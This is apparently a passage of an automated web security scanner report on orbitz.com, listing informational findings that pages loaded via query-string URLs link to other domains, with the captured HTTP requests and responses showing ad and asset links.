<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,1720,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,23218,24028,24031,24032,27371,30359,34504,34960,38844,39489,39804,42624,42960,45767,47055,47463,48051,49979,50264,50404,53234,54582,55025,55153,55715,56024,57889,59626,60715,61059,61063,61817,62466,62885,62910,62961,63592,64039&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,22584,27203,32259,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.230. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:40 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.231. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=1 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 909
Date: Mon, 03 Oct 2011 00:07:23 GMT
Cache-Control: private
Content-Length: 909

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=84082&AdID=273149&TargetID=37186&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14861,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37186,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66787,66797,67440,68027,68271,68362,68366,68375,96177,103024,103053,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dpromotions%26cnt%3DPRO%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_FallHotelSale-40_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.232. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /shared/adserverProxy.jsp?tab=4 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 862
Date: Mon, 03 Oct 2011 00:07:32 GMT
Cache-Control: private
Content-Length: 862

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=274358&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37187,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66790,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fcruises.orbitz.com%2Fpromotion%2Fcruise-event.do"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_FallSale_0908-0930_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

19.233. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=5 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 934
Date: Mon, 03 Oct 2011 00:07:36 GMT
Cache-Control: private
Content-Length: 934

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=270945&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14865,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37188,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66791,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dorbitz-price-assurance%26cnt%3DOVI%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PriceAssurance-OnlyOrbitz-NEW_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.234. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=2 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OSC=71A4AF1632EAB3B1F4E0C49149EEC65B; anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317596806325:ss=1317596806325; mbox=check#true#1317600467|session#1317600406536-142286#1317602267; adRotator=true; logging=71A4AF1632EAB3B1F4E0C49149EEC65B|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 890
Date: Mon, 03 Oct 2011 00:07:24 GMT
Cache-Control: private
Content-Length: 890

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81438&AdID=270694&TargetID=37184&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14862,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50391,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37184,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66788,66797,67440,68027,68271,68362,68366,68375,96177,103024,103054,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dvegasvacation%26cnt%3DPKH%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/ORB_cs_LasVegas-LastMinute_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.235. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /shared/adserverProxy.jsp?tab=4 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 849
Date: Mon, 03 Oct 2011 00:34:03 GMT
Cache-Control: private
Content-Length: 849

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81441&AdID=274358&TargetID=37187&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14864,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37187,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66790,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fcruises.orbitz.com%2Fpromotion%2Fcruise-event.do"><img src="http://www.revresda.com/Marketing/Images/US/MERCH/cs/1024/orb/crs/ORB_FallSale_0908-0930_519x225.jpg" border=0 height=225 width=519 alt="Click Here"></a>
...[SNIP]...

19.236. http://www.orbitz.com/shared/adserverProxy.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shared/adserverProxy.jsp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /shared/adserverProxy.jsp?tab=5 HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
X-Prototype-Version: 1.6.0.3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Referer: http://www.orbitz.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; OrbitzRegistration="N,0,0,0"; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598401966:ss=1317596806325; mbox=session#1317600406536-142286#1317603863|PC#1317600406536-142286.19#1320194003|check#true#1317602063; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|; adRotator=true

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html
Cteonnt-Length: 921
Date: Mon, 03 Oct 2011 00:34:08 GMT
Cache-Control: private
Content-Length: 921

<a target="_top" href="http://www.revresda.com/event.ng/Type=click&FlightID=81442&AdID=270945&TargetID=37188&ASeg=&AMod=&Segments=65,3724,4979,5788,7409,8303,8773,11672,12591,14865,22067,24028,27371,30359,34504,34960,38844,39489,39804,42624,45767,47055,47463,48051,49979,50264,50404,59626,60715,61817,62466,62910,63592,64040&Targets=37627,37188,41261&Values=34,46,63,80,92,101,194,216,264,32876,33112,33119,33156,33234,34137,34581,34635,35048,35586,35793,36105,36112,36138,66791,66797,67440,68027,68271,68362,68366,68375,96177,103024,103078,103453&RawValues=&WebLogicSession=&Params.User.UserID=$User.UserID$&Redirect=http%3A%2F%2Fwww.orbitz.com%2FApp%2FPerformMDLPDealsContent%3Fdeal_id%3Dorbitz-price-assurance%26cnt%3DOVI%26type%3Dcs_qs"><img src="http://www.orbitz.com/Marketing/Images/US/MERCH/cs/1024/orb/dph/ORB_cs_PriceAssurance-OnlyOrbitz-NEW_519x225.jpg" border=0 height=225 width=519 alt="Click Here">
...[SNIP]...

19.237. http://www.orbitz.com/shop/hotelsearch

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.orbitz.com
Path:   /shop/hotelsearch

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /shop/hotelsearch?type=hotel&hotel.keyword.key=bos&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/09/11&hotel.chkout=10/16/11&search=Search&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot HTTP/1.1
Host: www.orbitz.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trip.com/hotels.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anon=10644782471317600406435; BetaGroup="10/02/2011 19:06:46|A|A|N|C|N|H|B|P|N"; myTests=UBP323_SinglePage:|:|MERCH500_LeadPriceHiding:|HOTEL200_SR_Navigation:1|:|HotelRecommendationAlgorithm:|UBP_Telesales_Optimization:|:|:|HOTEL210_Dateless_Recommendations:|v1; _br_uid_1=uid%3D999836241826%3A; curr=USD; MKTG="ABCDEFGHU0VNfEMxMTI4N3g2MDAtQ1lCb3N0b24sVW5pdGVkIFN0YXRlc3wgfDEzMTc2MDE2MjE4Mjd8QzExMjg3eDYwMC1DWUJvc3RvbixVbml0ZWQgU3RhdGVzfCB8MTAvMDIvMjAxMSAxOToyNzowMSBQTXwgfCA="; dpc=HOTEL%7C2.2%7C%7CBoston%2CUnited+States%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-04%7C2011-10-07%7C%7C+%7C%26%26HE; _br_uid_2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A; OSC=6EA6F85923281CCF7F006954C370B1AB; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72845525d5f4f58455e445a4a4217b9; NSC_xxx.pscjua.dpn.80_gxe=ffffffff09e3087545525d5f4f58455e445a4a423660; adRotator=true; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; PackagingContext=APH; DataPersistence=||||||||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|BOS|MIA|10/11/11|||||||||10/24/11|10/24/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||advanced|; OrbitzRegistration="N,2,0,0"; WT_FPC=id=50.23.123.106-1472814720.30179680:lv=1317598618455:ss=1317596806325; mbox=session#1317600406536-142286#1317604079|PC#1317600406536-142286.19#1320194219|check#true#1317602279; logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: logging=6EA6F85923281CCF7F006954C370B1AB|egapp27p|egapp2192p.prod.orbitz.net; Domain=.orbitz.com; Path=/
Set-Cookie: curr=USD; Expires=Sat, 21-Oct-2079 03:52:52 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
P3P: CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR DELi SAMi OTRi BUS PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE GOV"
Pragma: no-cache
Cache-Control: no-store
Set-Cookie: MKTG=ABCDEFGHU0VNfEMxMTI4N3g3MTl8IHwxMzE3NjAyMzI1NDY3fEMxMTI4N3g3MTl8fDEwLzAyLzIwMTEgMTk6Mzg6NDUgUE18IHwg; Domain=orbitz.com; Expires=Wed, 02-Nov-2011 00:38:45 GMT; Path=/
Set-Cookie: dpc=HOTEL%7C2.2%7C%7Cbos%7C%7C%7CUS%7C%7C%7C+%26%26HB%7C%7C2011-10-09%7C2011-10-16%7C%7C+%7C%26%26HE; Expires=Fri, 02-Dec-2011 00:38:45 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 03 Oct 2011 00:38:45 GMT
Content-Length: 243900


...[SNIP]...
<link rel="canonical" href="http://www.orbitz.com/hotels/United_States--MA/Boston/"/>
<link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll1.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/POS/ORB/cssAll2.css" media="all"/>
               <link rel="stylesheet" type="text/css" href="http://www.tnetnoc.com/static/28.12.12/style/global/printAll.css" media="print">
               <!--[if IE 6]>
...[SNIP]...
<!-- BEGIN LivePerson Monitor. -->
       <script type="text/javascript" src="http://www.tnetnoc.com/static/28.12.12/script/jsAllTealeaf.js"></script>
...[SNIP]...
<a href="http://www.orbitz.com/" class="link"> <img src="http://www.tnetnoc.com/siteImages/ORB/brandImages/headerLogo/logo-2.png" alt="Orbitz" height="28" width="153" class="logo" />
    </a>
...[SNIP]...
<div class="telesalesImages">
        <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/results/telesales/ORB_Telesales_StalkBar-1.png" alt="Call us to book 1-800-733-1297" height="58" width="160" />
    </div>
...[SNIP]...
bitz.com/App/PerformMDLPDealsContent?deal_id=why-book-hotels&cnt=OVI" class="link" data-agent="{
       &#034;type&#034;:&#034;PopupWindow&#034;
       
   }" target="_blank"> <img src="http://www.tnetnoc.com/siteImages/ORB/banners/hotel/searchBar/marketing/ORB_Hotel_Marketing_Banner-1.png" alt="" height="29" width="960" class="searchBarBanner" />
    </a>
...[SNIP]...
earch&DCSext.mc_kw=&WT.mc_ev=click&WT.mc_id=o_trip_hot&gcid=C11287x719&lpid=plhot&hsv.page=1&hsv.location=11231" class="resetLocation link" delegatedtracking="true"> <img src="http://www.tnetnoc.com/siteImages/ORB/icons/process/remove/extraSmall/extraSmall-1.png" alt="Remove" height="9" width="9" />
    </a>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star5/medium/star5-1.png" alt="5 stars" height="13" width="70" class="starRating" />
   
                                       (7)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star4/medium/star4-1.png" alt="4 stars" height="13" width="70" class="starRating" />
   
                                       (36)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star3/medium/star3-1.png" alt="3 stars" height="13" width="70" class="starRating" />
   
                                       (87)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star2/medium/star2-1.png" alt="2 stars" height="13" width="70" class="starRating" />
   
                                       (37)</span>
...[SNIP]...
<span><img src="http://www.tnetnoc.com/siteImages/ORB/icons/stars/star1/medium/star1-1.png" alt="1 star" height="13" width="70" class="starRating" />
   
                                       (4)</span>
...[SNIP]...
<div class="ad sponsoredHotelResultsCard top1" >
                       <script type="text/javascript" src="http://www.revresda.com/js.ng/adsize=568x143&amp;pos=top1&amp;Section=results&amp;channel=hotel&amp;tile=1317602326150&amp;refUrl=http%3A%2F%2Fwww.orbitz.com%2F&amp;spu=true&amp;location=US&amp;secure=false&amp;state=MA&amp;searchType=hotel&amp;CookieName=PRO2&amp;currency=USD&amp;aboveThreshold=true&amp;city=BOSTON&amp;passengers=a&amp;preTeen=0&amp;search=Search&amp;mkid=36053&amp;hotelSearchType=keyword&amp;infants=0&amp;site=orbitz&amp;platform=austin&amp;gradeSchoolers=0&amp;numberOfAdultsRoom0=1&amp;hotelCheckOutDate=10%2F16%2F11&amp;productPath=HOTEL&amp;numberOfRooms=1&amp;hotelCheckInDate=10%2F9%2F11&amp;preSchoolers=0&amp;m=0&amp;toddlers=0&amp;country=US&amp;v=50.23.123.106-1472814720.30179680&amp;dest=LOGAN_INT%27L_AIRPORT&amp;numberOfChildren=0&amp;teenagers=0&amp;subdomain=orbitz&amp;language=en_US"></script>
...[SNIP]...
